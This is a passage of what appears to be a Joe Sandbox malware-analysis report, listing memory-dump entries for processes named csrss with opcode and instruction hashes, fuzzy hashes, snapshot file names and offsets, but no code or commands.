                                                      • Opcode Fuzzy Hash: 069208255a8f16878afe87ed4269f670172b69dc563c41a5ec61e3c23eab89b7
                                                      • Instruction Fuzzy Hash: 85014956D8E9922ED70D76BCB8560F83B50EF0227AF4C90B7D08C8A163DE1D5089C7D9
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 777e400bdcb17ddbea704fe2f1df7eab1b90a5bc9cf831a6d03ede6fc709789b
                                                      • Instruction ID: fb8c2fdcee2fb3825c8ad6c16712a7809050115efd7820a70ba5cfbce46d820d
                                                      • Opcode Fuzzy Hash: 777e400bdcb17ddbea704fe2f1df7eab1b90a5bc9cf831a6d03ede6fc709789b
                                                      • Instruction Fuzzy Hash: 76017132F089098FEB54EA59D4847FD73E2FB983A0F454071E01DD7181DB39A8828B54
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 255e3edd2986af6da890c4f348543e18385608188dbd45ed46d2ca7db6518ae3
                                                      • Instruction ID: 4c9a81626f8b80b18402cd476576c98ea3f88fc4759ce3e2819838de5b43d1d4
                                                      • Opcode Fuzzy Hash: 255e3edd2986af6da890c4f348543e18385608188dbd45ed46d2ca7db6518ae3
                                                      • Instruction Fuzzy Hash: 1601C07190D7899FE702FF68C4542D9BFB0EF42350F1545B6E040DB292DA3856498784
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4a4cd38383cc3d6bc3f4f5a9d225dc607f98e32321992e968a583706b9fadbc7
                                                      • Instruction ID: 96ce92825816450565012f2c9121a35001dac107a97e1645cbd96ddc30d274a4
                                                      • Opcode Fuzzy Hash: 4a4cd38383cc3d6bc3f4f5a9d225dc607f98e32321992e968a583706b9fadbc7
                                                      • Instruction Fuzzy Hash: 9AF04C31D0C6860FE762B66484152B93791BF96354F0802BBC44ED70C3DE3CA9068355
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 62ed21e564b9d0c8c3b40304152f559fe7db0f64d2a9551da839e6888d78b090
                                                      • Instruction ID: 03c72c77711e027b8cecfef6a0015a3f766c79b065b262f3d1abeb92a48709b4
                                                      • Opcode Fuzzy Hash: 62ed21e564b9d0c8c3b40304152f559fe7db0f64d2a9551da839e6888d78b090
                                                      • Instruction Fuzzy Hash: 2C019A7190D7899FE702FF68C8842D8BFB0EF42350F1841E6E040DB292EA386A49C780
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fd212eaee4304403d700ee7206c01cc869021635d1ce47df293de732c1a5609b
                                                      • Instruction ID: 59bb56e5e701b8bb38fb55e67d283a99e6973c20fbfe66ea38e8277bfd60e81b
                                                      • Opcode Fuzzy Hash: fd212eaee4304403d700ee7206c01cc869021635d1ce47df293de732c1a5609b
                                                      • Instruction Fuzzy Hash: CE014B21E0C85A8FFA94FA548855AA87391FF65390F5442F6D80DE72D2DF38BD428B84
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f1e0879ce2e51a29a0114b46164552b0f34bd5842f23093ef825ff80efe66a51
                                                      • Instruction ID: 3b719e9099e82e90e9ada26b565f2b154c0acb93bd95f2f993c4407bb00679b2
                                                      • Opcode Fuzzy Hash: f1e0879ce2e51a29a0114b46164552b0f34bd5842f23093ef825ff80efe66a51
                                                      • Instruction Fuzzy Hash: 40017130A2DA198FDB98EB1884556AD77A1FF94704F5040AAC449C3285CF38A9818B45
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4c1ea5e040ea1c846ecc50f1307cad16a9ae30ce56970c9135266df04daa6fc7
                                                      • Instruction ID: ec91118c42f0f38d5b516f879886d74d3e769dc378e5712c28a72e638c911e0d
                                                      • Opcode Fuzzy Hash: 4c1ea5e040ea1c846ecc50f1307cad16a9ae30ce56970c9135266df04daa6fc7
                                                      • Instruction Fuzzy Hash: 7C01DF71E0D5268FEBA1BAA8C0546B9B391FF94354F1401F6C00ED3282DF382D418B44
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c55e2f4f696fba31dc5410f8d9a4328a81449f0cbc6605396837b47cf8eb97d2
                                                      • Instruction ID: 2369f6946d081475bcbbe0390a4d5c15ff217f29dd4d6b74ddd0b5fb5e27b8c4
                                                      • Opcode Fuzzy Hash: c55e2f4f696fba31dc5410f8d9a4328a81449f0cbc6605396837b47cf8eb97d2
                                                      • Instruction Fuzzy Hash: 5601287090D7899FE702FBA884942A9BFB0EF12354F1845E6E440DB296EA385A488745
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2f6fed55b2d606ec73f4839205813a9a560f7cca4f3b2b447d10a174a14de459
                                                      • Instruction ID: 4ed8c043ea477c4ef486fef43331e3f133342943b812b39fad9174d789841198
                                                      • Opcode Fuzzy Hash: 2f6fed55b2d606ec73f4839205813a9a560f7cca4f3b2b447d10a174a14de459
                                                      • Instruction Fuzzy Hash: 35F0EC31B0CBD44FC729553D54550617FF1DB5B60234902EFC086C76E3DD54AC868781
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 436df963ac4971543a82ffba23c3fc813e1d492e3c47f0be546b0eaff253ac19
                                                      • Instruction ID: d64427c136db92936d8562b428aee26614512583f071d1797a377af5398fd510
                                                      • Opcode Fuzzy Hash: 436df963ac4971543a82ffba23c3fc813e1d492e3c47f0be546b0eaff253ac19
                                                      • Instruction Fuzzy Hash: E2F04F7094C85E8EEBB4FA54C8446F8B3A2FF90391F5442B5D00DD31A2DF78A9C18B48
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dc55377851fb8f2b424eea3a09fd1ec907400c0a3e5872b5bbc0f6ebdb472935
                                                      • Instruction ID: a4ca90bd5351c3e89d3c711e40f6289ae7b429ef34a66c6dce0c6e30b749683e
                                                      • Opcode Fuzzy Hash: dc55377851fb8f2b424eea3a09fd1ec907400c0a3e5872b5bbc0f6ebdb472935
                                                      • Instruction Fuzzy Hash: 8AF04970E0890B8FEB98EA4DC8556FE77B1FB54351F00063AC016D3285DF3869428B84
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a490861116e8e69671a6ecb08362713a797288d0051d210d70fd1fe935f2f0d9
                                                      • Instruction ID: c59a2b190a08917693f74a9353c94acd76424994809daee63970a9379735a67f
                                                      • Opcode Fuzzy Hash: a490861116e8e69671a6ecb08362713a797288d0051d210d70fd1fe935f2f0d9
                                                      • Instruction Fuzzy Hash: 8DF0A03925EA85DFD346EB3DC8A58D5BF60FF07204B5601EAD089CB463C315589DCB51
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e495da3fe376052116846afbada5c410e37c1102820373cb9de99df49352bde9
                                                      • Instruction ID: 332327530b5825f6e1a815623e0b438931fd69f7bfe3828ec3eff07aa61addf1
                                                      • Opcode Fuzzy Hash: e495da3fe376052116846afbada5c410e37c1102820373cb9de99df49352bde9
                                                      • Instruction Fuzzy Hash: 3CF05E20E1DD0A8FE295FB1940993BDB2D1FB98781F9401B5C40DC3283DF3868819345
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b1f6850ea463fbd98618da56179b592f4e9e7f7347a8285fffb6543d260b0736
                                                      • Instruction ID: 6a1efb1da7b0d52b46fd3742112398c65a92dc3c01ef87487a52ce76d9acd590
                                                      • Opcode Fuzzy Hash: b1f6850ea463fbd98618da56179b592f4e9e7f7347a8285fffb6543d260b0736
                                                      • Instruction Fuzzy Hash: A1F05E30D0C5474FEA58BA1894406B933D1FF49394F514575E85EE32D7DF38BC524688
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a2c5ea5f636c987af263b5fdadf485b1e4b37b9572e46316133d7d0a7c0d2da8
                                                      • Instruction ID: e632629a13c288fd40e49167fc9eed5a3bc03506c75983479b4ffe746cb3388f
                                                      • Opcode Fuzzy Hash: a2c5ea5f636c987af263b5fdadf485b1e4b37b9572e46316133d7d0a7c0d2da8
                                                      • Instruction Fuzzy Hash: 8CE01531A189098FEB94FBA8D4456E8B3A1FF48351F1000B6D00ED7692CA24A8118B44
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9f57d29265651e36853527e4a66c41391508d8cbfef4a2d168007f093ad7f1d5
                                                      • Instruction ID: 005d4197d2efd80e39390d411697df2a860af41cc7756798f8296d7273db1cfe
                                                      • Opcode Fuzzy Hash: 9f57d29265651e36853527e4a66c41391508d8cbfef4a2d168007f093ad7f1d5
                                                      • Instruction Fuzzy Hash: 92E0922060ABC84FC70EA63848685607FB1EB7711178902DBC045CB2A3D919DC89C751
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 369a34f16f6ef5f9b6f321a989fca502e6984126a83cfcbd20b969cf08aa95b5
                                                      • Instruction ID: 117d398a96bb739c59f9276ad66b5cb833d5a23d66dc7938b8128c3a9732a1ca
                                                      • Opcode Fuzzy Hash: 369a34f16f6ef5f9b6f321a989fca502e6984126a83cfcbd20b969cf08aa95b5
                                                      • Instruction Fuzzy Hash: 0CE04F21A4E7C44FC30A56348C699543FB1DF67215B4A41DBC485CF2B3D65EDC89C711
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c96f83e07883fca753af22bc1c99dfc7d095508ff2e51b5cff882e8c949a1ec3
                                                      • Instruction ID: f23fcfcf4f1ba179b4cf74755830096687b2a8b6908daba8fab384b4cb7187fb
                                                      • Opcode Fuzzy Hash: c96f83e07883fca753af22bc1c99dfc7d095508ff2e51b5cff882e8c949a1ec3
                                                      • Instruction Fuzzy Hash: 1DE01A21A4E7C44FC30A56348C699543FA19F67215B4A41DBC485CF2B3D65A9C88C712
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1863e0135fde105c643c66801ba6d299cb992c1fe72685f9c8c81fe690a48548
                                                      • Instruction ID: ad8391b58df22416d08d03738914130b86940a99b47bce2f728dfc30279a68ef
                                                      • Opcode Fuzzy Hash: 1863e0135fde105c643c66801ba6d299cb992c1fe72685f9c8c81fe690a48548
                                                      • Instruction Fuzzy Hash: 2EE012349897804FC70A573488658943FB0DF57211B4640EBD045CB1B3D61D984DC752
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 47cbcdc54ea2d82ff77161c0754e1444da161be50743cd5490d6412486fd817f
                                                      • Instruction ID: d5028e84253b0d08a6a134b6bbb6af139556f03019dce6de6b23f8f8d7412ad3
                                                      • Opcode Fuzzy Hash: 47cbcdc54ea2d82ff77161c0754e1444da161be50743cd5490d6412486fd817f
                                                      • Instruction Fuzzy Hash: FBD0A730B6090D4B8B0CB63D8458430F3D1F7AA2167D452BDD40BC3285ED25ECC6CB84
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a06b60985aa9db39ab0d5be490f14ce91fefdc09fba2be95d94fe4c2d1642b69
                                                      • Instruction ID: 9828fb9e976b1d65435d8dabbe81c7c1e7bc6e36ce387b6031f85f7e1d1903ea
                                                      • Opcode Fuzzy Hash: a06b60985aa9db39ab0d5be490f14ce91fefdc09fba2be95d94fe4c2d1642b69
                                                      • Instruction Fuzzy Hash: B5D05E30B609094B9B0CB62D8459430F3D1F7AA60A7D452B8940BC2291ED25ECC68B84
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      • Instruction ID: 2be6c3af45126267e84e23460733430f1ed58d27bd9ecd8e1df65a2961587d55
                                                      • Opcode Fuzzy Hash: e17c4f4774bafc440d196bf9f9e395c720ab9a5d4131107851619529df9f3072
                                                      • Instruction Fuzzy Hash: 3F317E3190D68A8FDB46EB68C8659AD7BF1FF26340F4805FAC009D72A3DB39A844C751
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: abc5201d3bf48d6f532fc9f46dae3284417748f8bfb16af038bee4ecddce7207
                                                      • Instruction ID: 488d57df226086ee8f314acaddc54b96549d1e139deedd3335bbb04d3a6b1c82
                                                      • Opcode Fuzzy Hash: abc5201d3bf48d6f532fc9f46dae3284417748f8bfb16af038bee4ecddce7207
                                                      • Instruction Fuzzy Hash: 70318231E1C94A8FDB59EA18C4956A873E2FFA8394F04467AC00ED72C6DF78AC418785
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0378ff7ed68f68a7cfe5a58105f1753c0c79e5be56625cd470da80d2d6b9a2c3
                                                      • Instruction ID: 0642e7ef6e48916a42e25215fc4c1a0f1d51793a8785c85b63548b21457b08b7
                                                      • Opcode Fuzzy Hash: 0378ff7ed68f68a7cfe5a58105f1753c0c79e5be56625cd470da80d2d6b9a2c3
                                                      • Instruction Fuzzy Hash: FA213451A4DD5A3EF75CB27C644A2FC62C1EF483A1F6890BAE40DC31D3DE2CAC804699
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 035c5ad3b146be40c5fbf1f7ea6f0c1f034e7770c03c8b43d4b1691ea0a8c3ca
                                                      • Instruction ID: e2916f8f3927bac2856ae2f3f79d098971771a8ef401f154be0260b14a816d97
                                                      • Opcode Fuzzy Hash: 035c5ad3b146be40c5fbf1f7ea6f0c1f034e7770c03c8b43d4b1691ea0a8c3ca
                                                      • Instruction Fuzzy Hash: 03214C21E0C90A8FEBA4FB6884587BC22D2FF94391F9546B5D40DD32A2DF38AC418758
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6a9cb85d90d4f18db06203baf990c6006e871c005e10cf24dea2cab1469de9ee
                                                      • Instruction ID: 1f7f8fda6451ebf1505721d43828c150e6b4a3090ab9308927bf8d56434066ef
                                                      • Opcode Fuzzy Hash: 6a9cb85d90d4f18db06203baf990c6006e871c005e10cf24dea2cab1469de9ee
                                                      • Instruction Fuzzy Hash: B721D331A0D6899FE712FF28C8452EC7BA0FF42351F5445FAC0449B1D2DB3825498B65
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e90000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7be91c1f0ae83a7bd133f5a664b60ff76be4261f50f5324b4559f2b67a2b8251
                                                      • Instruction ID: abbd0e3e283a064e2ebac4cda9bf775290763dd3cefe0422f784367c7492297c
                                                      • Opcode Fuzzy Hash: 7be91c1f0ae83a7bd133f5a664b60ff76be4261f50f5324b4559f2b67a2b8251
                                                      • Instruction Fuzzy Hash: EB117C21E0C91A4FEBA8FB6884516B872D2FF98344F9005BAD40EC72D6DF78AC024784
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 77e45b08667d33d5be409acf47bdbf2a14762a80f4568414b71f0f3db44fe95f
                                                      • Instruction ID: 8b38697993ee0e8305bc40efb57c14ca45f4e3cbfb9792ba3fb2e0cb9f8a2776
                                                      • Opcode Fuzzy Hash: 77e45b08667d33d5be409acf47bdbf2a14762a80f4568414b71f0f3db44fe95f
                                                      • Instruction Fuzzy Hash: 3A11DA70908A198FDB94EB08C894FA9B3E1FB58311F5441AAD40EE7290CB34AEC4CF85
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9c8e71e527a25eb60cc7bead8d924e8a5263c10bd80aa7d004665807ae16341d
                                                      • Instruction ID: 3e2ee4ab451bbfa1aa9779ae36a969c299aecd2b97b891b4c87c5861ffc68329
                                                      • Opcode Fuzzy Hash: 9c8e71e527a25eb60cc7bead8d924e8a5263c10bd80aa7d004665807ae16341d
                                                      • Instruction Fuzzy Hash: 74118E31A0D68D9FE702FB28D8452EC7FB0FF42351F5546F6C084DB292DA3856498B95
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3c6ddcd6c5a4e0267749aafe49e673e007e3ca6a37d52b8255175e7da3b0ae95
                                                      • Instruction ID: b71984adc48415056163cd267d1085e04ccf1c7d40b1c881cf8088fd84907d6f
                                                      • Opcode Fuzzy Hash: 3c6ddcd6c5a4e0267749aafe49e673e007e3ca6a37d52b8255175e7da3b0ae95
                                                      • Instruction Fuzzy Hash: B2014E56D8E5922ED70C76BCB8560F43B90EF0227AF0C90B7D08C8A153DE0954898799
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d545d5c4f559d65fb27a59029cd5e88dcfb5553f0817c3e178727397a6fd7536
                                                      • Instruction ID: 9e065ad7913122c7fc9236e25b6fe66172d404b65aa14e20e3944da5c799c150
                                                      • Opcode Fuzzy Hash: d545d5c4f559d65fb27a59029cd5e88dcfb5553f0817c3e178727397a6fd7536
                                                      • Instruction Fuzzy Hash: E5017132F089098FEB55EA58D4803FC77A2FBA83A1F094175D01DE71D5DB39A8828758
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7410dcb7c1c4af9ef551c4d3616ea0af4d1460fa92bfbc28acc681870fe0ae17
                                                      • Instruction ID: d85d40a25b7ff359e4467be9493c396adcc6bec3f2e1cfd15c1ab4406b8f88ac
                                                      • Opcode Fuzzy Hash: 7410dcb7c1c4af9ef551c4d3616ea0af4d1460fa92bfbc28acc681870fe0ae17
                                                      • Instruction Fuzzy Hash: 2D016931A0D6899FE702EB28C8542EDBFB0FF42350F5545E6C080DB292DA3856498B95
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e90000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d8ad1ab5b87a28b0b99a930abff9c9a434606e57e53eaf8a08e68b3546d12f49
                                                      • Instruction ID: a91b8619bec2bf361a0c115887e1dd36093ec5f47597101b0e4213bdb8518002
                                                      • Opcode Fuzzy Hash: d8ad1ab5b87a28b0b99a930abff9c9a434606e57e53eaf8a08e68b3546d12f49
                                                      • Instruction Fuzzy Hash: A7F0FC31D0C5864FE766B66484142BA37D1BF96358F0902BBC44EC71D3DE7C99468355
                                                      Memory Dump Source
